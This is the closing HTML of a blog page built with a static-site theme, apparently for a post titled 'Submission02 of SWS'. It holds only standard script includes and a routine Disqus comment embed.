      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  

    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://yoursite.com/2020/05/15/SWS/Submission02/';
          this.page.identifier = '2020/05/15/SWS/Submission02/';
          this.page.title = 'Submission02 of SWS';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://disqus_eaniNzpdiO.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  














  





  

  

  

  
  

  

  

  

</body>
</html>
